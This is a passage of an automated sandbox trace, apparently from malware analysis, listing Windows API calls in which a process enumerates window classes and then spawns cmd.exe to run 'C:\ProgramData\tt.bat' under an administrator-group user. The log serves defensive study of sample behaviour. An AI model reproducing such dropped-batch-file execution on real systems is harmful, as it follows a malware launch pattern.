returned 0x1013c [0218.586] GetClassNameA (in: hWnd=0x1013c, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="ATL:000007FEF4C752C0") returned 20 [0218.586] lstrcmpA (lpString1="ATL:000007FEF4C752C0", lpString2="ThunderRT6Main") returned -1 [0218.586] GetWindowThreadProcessId (in: hWnd=0x1013c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x50c [0218.586] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10136 [0218.586] GetClassNameA (in: hWnd=0x10136, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.586] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.586] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5a4 [0218.586] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x10134 [0218.586] GetClassNameA (in: hWnd=0x10134, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="TaskSwitcherWnd") returned 15 [0218.586] lstrcmpA (lpString1="TaskSwitcherWnd", lpString2="ThunderRT6Main") returned -1 [0218.586] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5a4 [0218.586] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10076 [0218.586] GetClassNameA (in: hWnd=0x10076, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.586] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.586] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.586] GetWindow (hWnd=0x10076, uCmd=0x2) returned 0x10074 [0218.586] GetClassNameA (in: hWnd=0x10074, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.587] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.587] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.587] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x10060 [0218.587] GetClassNameA (in: hWnd=0x10060, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.587] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.587] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.587] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1008a [0218.587] GetClassNameA (in: hWnd=0x1008a, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.587] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.587] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.587] GetWindow (hWnd=0x1008a, uCmd=0x2) returned 0x1007e [0218.587] GetClassNameA (in: hWnd=0x1007e, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.587] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.587] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.587] GetWindow (hWnd=0x1007e, uCmd=0x2) returned 0x1007c [0218.587] GetClassNameA (in: hWnd=0x1007c, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.587] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.587] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.587] GetWindow (hWnd=0x1007c, uCmd=0x2) returned 0x10078 [0218.587] GetClassNameA (in: hWnd=0x10078, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.587] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.587] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.587] GetWindow (hWnd=0x10078, uCmd=0x2) returned 0x10056 [0218.587] GetClassNameA (in: hWnd=0x10056, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0218.587] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0218.587] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.588] GetWindow (hWnd=0x10056, uCmd=0x2) returned 0x1004e [0218.588] GetClassNameA (in: hWnd=0x1004e, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.588] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.588] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.588] GetWindow (hWnd=0x1004e, uCmd=0x2) returned 0x10058 [0218.588] GetClassNameA (in: hWnd=0x10058, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="Button") returned 6 [0218.588] lstrcmpA (lpString1="Button", lpString2="ThunderRT6Main") returned -1 [0218.588] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.588] GetWindow (hWnd=0x10058, uCmd=0x2) returned 0x10050 [0218.588] GetClassNameA (in: hWnd=0x10050, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="Shell_TrayWnd") returned 13 [0218.588] lstrcmpA (lpString1="Shell_TrayWnd", lpString2="ThunderRT6Main") returned -1 [0218.588] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.588] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x100f6 [0218.588] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.588] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.588] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x45c [0218.588] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x5009a [0218.588] GetClassNameA (in: hWnd=0x5009a, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.588] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.588] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.588] GetWindow (hWnd=0x5009a, uCmd=0x2) returned 0x1008c [0218.588] GetClassNameA (in: hWnd=0x1008c, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0218.588] lstrcmpA (lpString1="TaskListThumbnailWnd", lpString2="ThunderRT6Main") returned -1 [0218.588] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.588] GetWindow (hWnd=0x1008c, uCmd=0x2) returned 0x102ca [0218.588] GetClassNameA (in: hWnd=0x102ca, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0218.589] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0218.589] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.589] GetWindowLongA (hWnd=0x102ca, nIndex=-16) returned -1946157056 [0218.589] GetWindowLongPtrA (hWnd=0x102ca, nIndex=-6) returned 0x0 [0218.589] GetWindowLongPtrA (hWnd=0x102ca, nIndex=-6) returned 0x0 [0218.589] GetWindow (hWnd=0x102ca, uCmd=0x2) returned 0x20256 [0218.589] GetClassNameA (in: hWnd=0x20256, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.589] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.589] GetWindowThreadProcessId (in: hWnd=0x20256, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.589] GetWindowLongA (hWnd=0x20256, nIndex=-16) returned -1946157056 [0218.589] GetWindowLongPtrA (hWnd=0x20256, nIndex=-6) returned 0x13f7d0000 [0218.589] GetWindowLongPtrA (hWnd=0x20256, nIndex=-6) returned 0x13f7d0000 [0218.589] GetWindow (hWnd=0x20256, uCmd=0x2) returned 0x20292 [0218.589] GetClassNameA (in: hWnd=0x20292, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="XLMAIN") returned 6 [0218.589] lstrcmpA (lpString1="XLMAIN", lpString2="ThunderRT6Main") returned 1 [0218.589] GetWindowThreadProcessId (in: hWnd=0x20292, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.589] GetWindowLongA (hWnd=0x20292, nIndex=-16) returned 399441920 [0218.589] GetWindowLongPtrA (hWnd=0x20292, nIndex=-6) returned 0x13f7d0000 [0218.589] GetWindowLongPtrA (hWnd=0x20292, nIndex=-6) returned 0x13f7d0000 [0218.589] GetWindow (hWnd=0x20292, uCmd=0x2) returned 0x2037a [0218.589] GetClassNameA (in: hWnd=0x2037a, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0218.589] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0218.589] GetWindowThreadProcessId (in: hWnd=0x2037a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa0c [0218.589] GetWindow (hWnd=0x2037a, uCmd=0x2) returned 0x2037e [0218.589] GetClassNameA (in: hWnd=0x2037e, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.589] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.589] GetWindowThreadProcessId (in: hWnd=0x2037e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa0c [0218.589] GetWindow (hWnd=0x2037e, uCmd=0x2) returned 0x30392 [0218.589] GetClassNameA (in: hWnd=0x30392, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="ConsoleWindowClass") returned 18 [0218.589] lstrcmpA (lpString1="ConsoleWindowClass", lpString2="ThunderRT6Main") returned -1 [0218.590] GetWindowThreadProcessId (in: hWnd=0x30392, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x998 [0218.590] GetWindow (hWnd=0x30392, uCmd=0x2) returned 0x70108 [0218.590] GetClassNameA (in: hWnd=0x70108, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0218.590] lstrcmpA (lpString1="TASKENGINEWINDOWCLASS", lpString2="ThunderRT6Main") returned -1 [0218.590] GetWindowThreadProcessId (in: hWnd=0x70108, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x484 [0218.590] GetWindow (hWnd=0x70108, uCmd=0x2) returned 0x20354 [0218.590] GetClassNameA (in: hWnd=0x20354, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.590] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.590] GetWindowThreadProcessId (in: hWnd=0x20354, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x484 [0218.590] GetWindow (hWnd=0x20354, uCmd=0x2) returned 0x20228 [0218.590] GetClassNameA (in: hWnd=0x20228, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="ThunderMain") returned 11 [0218.590] lstrcmpA (lpString1="ThunderMain", lpString2="ThunderRT6Main") returned -1 [0218.590] GetWindowThreadProcessId (in: hWnd=0x20228, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.590] GetWindowLongA (hWnd=0x20228, nIndex=-16) returned -1946157056 [0218.590] GetWindowLongPtrA (hWnd=0x20228, nIndex=-6) returned 0x7fee4e20000 [0218.590] IsWindowEnabled (hWnd=0x20228) returned 0 [0218.590] GetPropA (hWnd=0x20228, lpString=0xc13d) returned 0x1 [0218.590] RemovePropA (hWnd=0x20228, lpString=0xc13d) returned 0x1 [0218.590] EnableWindow (hWnd=0x20228, bEnable=1) returned 1 [0218.590] GetWindow (hWnd=0x20228, uCmd=0x2) returned 0x2039c [0218.590] GetClassNameA (in: hWnd=0x2039c, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="XLMAIN") returned 6 [0218.590] lstrcmpA (lpString1="XLMAIN", lpString2="ThunderRT6Main") returned 1 [0218.590] GetWindowThreadProcessId (in: hWnd=0x2039c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.591] GetWindowLongA (hWnd=0x2039c, nIndex=-16) returned 131006464 [0218.591] GetWindowLongPtrA (hWnd=0x2039c, nIndex=-6) returned 0x13f7d0000 [0218.591] GetWindowLongPtrA (hWnd=0x2039c, nIndex=-6) returned 0x13f7d0000 [0218.591] GetWindow (hWnd=0x2039c, uCmd=0x2) returned 0x2032a [0218.591] GetClassNameA (in: hWnd=0x2032a, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="ComboLBox") returned 9 [0218.591] lstrcmpA (lpString1="ComboLBox", lpString2="ThunderRT6Main") returned -1 [0218.591] GetWindowThreadProcessId (in: hWnd=0x2032a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.591] GetWindowLongA (hWnd=0x2032a, nIndex=-16) returned 1149272145 [0218.591] GetWindow (hWnd=0x2032a, uCmd=0x2) returned 0x202fe [0218.591] GetClassNameA (in: hWnd=0x202fe, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="ComboLBox") returned 9 [0218.591] lstrcmpA (lpString1="ComboLBox", lpString2="ThunderRT6Main") returned -1 [0218.591] GetWindowThreadProcessId (in: hWnd=0x202fe, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.591] GetWindowLongA (hWnd=0x202fe, nIndex=-16) returned 1149272145 [0218.591] GetWindow (hWnd=0x202fe, uCmd=0x2) returned 0x10346 [0218.591] GetClassNameA (in: hWnd=0x10346, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0218.591] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0218.591] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x694 [0218.591] GetClassNameA (in: hWnd=0x202e2, lpClassName=0x1ed970, nMaxCount=64 | out: lpClassName="CFD File Open Message Window") returned 28 [0218.591] lstrcmpA (lpString1="CFD File Open Message Window", lpString2="ThunderRT6Main") returned -1 [0218.592] GetWindowThreadProcessId (in: hWnd=0x202e2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.592] GetWindowLongA (hWnd=0x202e2, nIndex=-16) returned 213909504 [0218.592] GetWindowLongPtrA (hWnd=0x202e2, nIndex=-6) returned 0x7feee220000 [0218.592] GetWindowLongPtrA (hWnd=0x202e2, nIndex=-6) returned 0x7feee220000 [0218.592] GetWindowLongPtrA (hWnd=0x302ba, nIndex=-6) returned 0x7fef13d0000 [0218.592] GetWindowLongPtrA (hWnd=0x302ba, nIndex=-6) returned 0x7fef13d0000 [0218.592] GetWindowLongPtrA (hWnd=0x10266, nIndex=-6) returned 0x13f7d0000 [0218.592] GetWindowLongPtrA (hWnd=0x10266, nIndex=-6) returned 0x13f7d0000 [0218.592] GetWindowLongPtrA (hWnd=0x90254, nIndex=-6) returned 0x13f7d0000 [0218.592] GetWindowLongPtrA (hWnd=0x90254, nIndex=-6) returned 0x13f7d0000 [0218.592] GetWindowLongPtrA (hWnd=0x302b8, nIndex=-6) returned 0x7fefeae0000 [0218.592] GetWindowLongPtrA (hWnd=0x302b8, nIndex=-6) returned 0x7fefeae0000 [0218.593] GetWindowLongPtrA (hWnd=0x2020c, nIndex=-6) returned 0x13f7d0000 [0218.593] GetWindowLongPtrA (hWnd=0x2020c, nIndex=-6) returned 0x13f7d0000 [0218.593] IMalloc:Alloc (This=0x7fefecb5380, cb=0x18) returned 0x783c8d0 [0218.593] IMalloc:Free (This=0x7fefecb5380, pv=0x783c8d0) [0218.716] GetCurrentThreadId () returned 0xae8 [0218.716] GetWindowLongA (hWnd=0x0, nIndex=-16) returned 0 [0218.716] GetDesktopWindow () returned 0x10010 [0218.716] GetWindowLongPtrA (hWnd=0x102ca, nIndex=-6) returned 0x0 [0218.716] GetWindowLongPtrA (hWnd=0x102ca, nIndex=-6) returned 0x0 [0218.716] GetWindowLongPtrA (hWnd=0x20256, nIndex=-6) returned 0x13f7d0000 [0218.716] GetWindowLongPtrA (hWnd=0x20256, nIndex=-6) returned 0x13f7d0000 [0218.716] GetWindowLongPtrA (hWnd=0x20292, nIndex=-6) returned 0x13f7d0000 [0218.716] GetWindowLongPtrA (hWnd=0x20292, nIndex=-6) returned 0x13f7d0000 [0218.716] GetWindowLongPtrA (hWnd=0x20228, nIndex=-6) returned 0x7fee4e20000 [0218.716] IsWindowEnabled (hWnd=0x20228) returned 1 [0218.716] GetPropA (hWnd=0x20228, lpString=0xc13d) returned 0x0 [0218.716] SetPropA (hWnd=0x20228, lpString=0xc13d, hData=0x1) returned 1 [0218.717] EnableWindow (hWnd=0x20228, bEnable=0) returned 0 [0218.717] GetWindowLongPtrA (hWnd=0x2039c, nIndex=-6) returned 0x13f7d0000 [0218.717] GetWindowLongPtrA (hWnd=0x2039c, nIndex=-6) returned 0x13f7d0000 [0218.717] GetWindowLongPtrA (hWnd=0x202e2, nIndex=-6) returned 0x7feee220000 [0218.717] GetWindowLongPtrA (hWnd=0x202e2, nIndex=-6) returned 0x7feee220000 [0218.717] GetWindowLongPtrA (hWnd=0x302ba, nIndex=-6) returned 0x7fef13d0000 [0218.717] GetWindowLongPtrA (hWnd=0x302ba, nIndex=-6) returned 0x7fef13d0000 [0218.717] GetWindowLongPtrA (hWnd=0x10266, nIndex=-6) returned 0x13f7d0000 [0218.717] GetWindowLongPtrA (hWnd=0x10266, nIndex=-6) returned 0x13f7d0000 [0218.717] GetWindowLongPtrA (hWnd=0x90254, nIndex=-6) returned 0x13f7d0000 [0218.717] GetWindowLongPtrA (hWnd=0x90254, nIndex=-6) returned 0x13f7d0000 [0218.717] GetWindowLongPtrA (hWnd=0x302b8, nIndex=-6) returned 0x7fefeae0000 [0218.717] GetWindowLongPtrA (hWnd=0x302b8, nIndex=-6) returned 0x7fefeae0000 [0218.718] GetWindowLongPtrA (hWnd=0x2020c, nIndex=-6) returned 0x13f7d0000 [0218.718] GetWindowLongPtrA (hWnd=0x2020c, nIndex=-6) returned 0x13f7d0000 [0218.718] IMalloc:Alloc (This=0x7fefecb5380, cb=0x18) returned 0x7dce200 [0218.718] IMalloc:Free (This=0x7fefecb5380, pv=0x7dce200) [0219.218] GetAsyncKeyState (vKey=27) returned 0 [0219.218] GetCurrentThreadId () returned 0xae8 [0219.218] GetWindowLongA (hWnd=0x0, nIndex=-16) returned 0 [0219.219] GetDesktopWindow () returned 0x10010 [0219.219] GetWindowLongPtrA (hWnd=0x102ca, nIndex=-6) returned 0x0 [0219.219] GetWindowLongPtrA (hWnd=0x102ca, nIndex=-6) returned 0x0 [0219.219] GetWindowLongPtrA (hWnd=0x20256, nIndex=-6) returned 0x13f7d0000 [0219.219] GetWindowLongPtrA (hWnd=0x20256, nIndex=-6) returned 0x13f7d0000 [0219.219] GetWindowLongPtrA (hWnd=0x2039c, nIndex=-6) returned 0x13f7d0000 [0219.219] GetWindowLongPtrA (hWnd=0x2039c, nIndex=-6) returned 0x13f7d0000 [0219.219] GetWindowLongPtrA (hWnd=0x20292, nIndex=-6) returned 0x13f7d0000 [0219.219] GetWindowLongPtrA (hWnd=0x20292, nIndex=-6) returned 0x13f7d0000 [0219.219] GetWindowLongPtrA (hWnd=0x20228, nIndex=-6) returned 0x7fee4e20000 [0219.219] IsWindowEnabled (hWnd=0x20228) returned 0 [0219.219] GetPropA (hWnd=0x20228, lpString=0xc13d) returned 0x1 [0219.219] RemovePropA (hWnd=0x20228, lpString=0xc13d) returned 0x1 [0219.219] EnableWindow (hWnd=0x20228, bEnable=1) returned 1 [0219.219] GetWindowLongPtrA (hWnd=0x202e2, nIndex=-6) returned 0x7feee220000 [0219.220] GetWindowLongPtrA (hWnd=0x202e2, nIndex=-6) returned 0x7feee220000 [0219.220] GetWindowLongPtrA (hWnd=0x302ba, nIndex=-6) returned 0x7fef13d0000 [0219.220] GetWindowLongPtrA (hWnd=0x302ba, nIndex=-6) returned 0x7fef13d0000 [0219.220] GetWindowLongPtrA (hWnd=0x10266, nIndex=-6) returned 0x13f7d0000 [0219.220] GetWindowLongPtrA (hWnd=0x10266, nIndex=-6) returned 0x13f7d0000 [0219.220] GetWindowLongPtrA (hWnd=0x90254, nIndex=-6) returned 0x13f7d0000 [0219.220] GetWindowLongPtrA (hWnd=0x90254, nIndex=-6) returned 0x13f7d0000 [0219.220] GetWindowLongPtrA (hWnd=0x302b8, nIndex=-6) returned 0x7fefeae0000 [0219.220] GetWindowLongPtrA (hWnd=0x302b8, nIndex=-6) returned 0x7fefeae0000 [0219.220] GetWindowLongPtrA (hWnd=0x2020c, nIndex=-6) returned 0x13f7d0000 [0219.220] GetWindowLongPtrA (hWnd=0x2020c, nIndex=-6) returned 0x13f7d0000 [0219.220] IMalloc:Alloc (This=0x7fefecb5380, cb=0x18) returned 0x783d1d0 [0219.220] IMalloc:Free (This=0x7fefecb5380, pv=0x783d1d0) Thread: id = 37 os_tid = 0x748 Thread: id = 38 os_tid = 0x7a8 Thread: id = 39 os_tid = 0x718 Thread: id = 40 os_tid = 0x5a8 Thread: id = 41 os_tid = 0x5dc Thread: id = 42 os_tid = 0x8a8 Thread: id = 53 os_tid = 0xaac Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x610e2000" os_pid = "0x938" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xad4" cmd_line = "cmd.exe /c C:\\ProgramData\\tt.bat" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 43 os_tid = 0x948 [0213.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efd50 | out: lpSystemTimeAsFileTime=0x2efd50*(dwLowDateTime=0xf0ffee40, dwHighDateTime=0x1d60de6)) [0213.382] GetCurrentProcessId () returned 0x938 [0213.382] GetCurrentThreadId () returned 0x948 [0213.382] GetTickCount () returned 0x1167169 [0213.382] QueryPerformanceCounter (in: lpPerformanceCount=0x2efd58 | out: lpPerformanceCount=0x2efd58*=27902423760) returned 1 [0213.384] GetModuleHandleW (lpModuleName=0x0) returned 0x49d70000 [0213.384] __set_app_type (_Type=0x1) [0213.384] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49d97810) returned 0x0 [0213.384] __getmainargs (in: _Argc=0x49dba608, _Argv=0x49dba618, _Env=0x49dba610, _DoWildCard=0, _StartInfo=0x49d9e0f4 | out: _Argc=0x49dba608, _Argv=0x49dba618, _Env=0x49dba610) returned 0 [0213.384] GetCurrentThreadId () returned 0x948 [0213.384] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x948) returned 0x3c [0213.385] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x778b0000 [0213.385] GetProcAddress (hModule=0x778b0000, lpProcName="SetThreadUILanguage") returned 0x778c6d40 [0213.385] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0213.385] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.385] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efce8 | out: phkResult=0x2efce8*=0x0) returned 0x2 [0213.386] VirtualQuery (in: lpAddress=0x2efcd0, lpBuffer=0x2efc50, dwLength=0x30 | out: lpBuffer=0x2efc50*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0213.386] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efc50, dwLength=0x30 | out: lpBuffer=0x2efc50*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0213.386] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efc50, dwLength=0x30 | out: lpBuffer=0x2efc50*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0213.386] VirtualQuery (in: lpAddress=0x1f4000, lpBuffer=0x2efc50, dwLength=0x30 | out: lpBuffer=0x2efc50*(BaseAddress=0x1f4000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0213.386] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efc50, dwLength=0x30 | out: lpBuffer=0x2efc50*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0213.386] GetConsoleOutputCP () returned 0x1b5 [0213.386] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dabfe0 | out: lpCPInfo=0x49dabfe0) returned 1 [0213.386] SetConsoleCtrlHandler (HandlerRoutine=0x49d93184, Add=1) returned 1 [0213.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.386] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.387] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d9e194 | out: lpMode=0x49d9e194) returned 1 [0213.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.387] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.387] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.387] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d9e198 | out: lpMode=0x49d9e198) returned 1 [0213.388] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.388] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.388] GetEnvironmentStringsW () returned 0x468bc0* [0213.388] GetProcessHeap () returned 0x450000 [0213.388] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb10) returned 0x4696e0 [0213.388] FreeEnvironmentStringsW (penv=0x468bc0) returned 1 [0213.389] GetProcessHeap () returned 0x450000 [0213.389] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x8) returned 0x468440 [0213.389] GetEnvironmentStringsW () returned 0x468bc0* [0213.389] GetProcessHeap () returned 0x450000 [0213.389] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb10) returned 0x46a200 [0213.389] FreeEnvironmentStringsW (penv=0x468bc0) returned 1 [0213.389] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeba8 | out: phkResult=0x2eeba8*=0x44) returned 0x0 [0213.389] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x0, lpData=0x2eebc0*=0x18, lpcbData=0x2eeba4*=0x1000) returned 0x2 [0213.389] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: lpType=0x2eeba0*=0x4, lpData=0x2eebc0*=0x1, lpcbData=0x2eeba4*=0x4) returned 0x0 [0213.389] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeba0, lpData=0x2eebc0, lpcbData=0x2eeba4*=0x1000 | out: 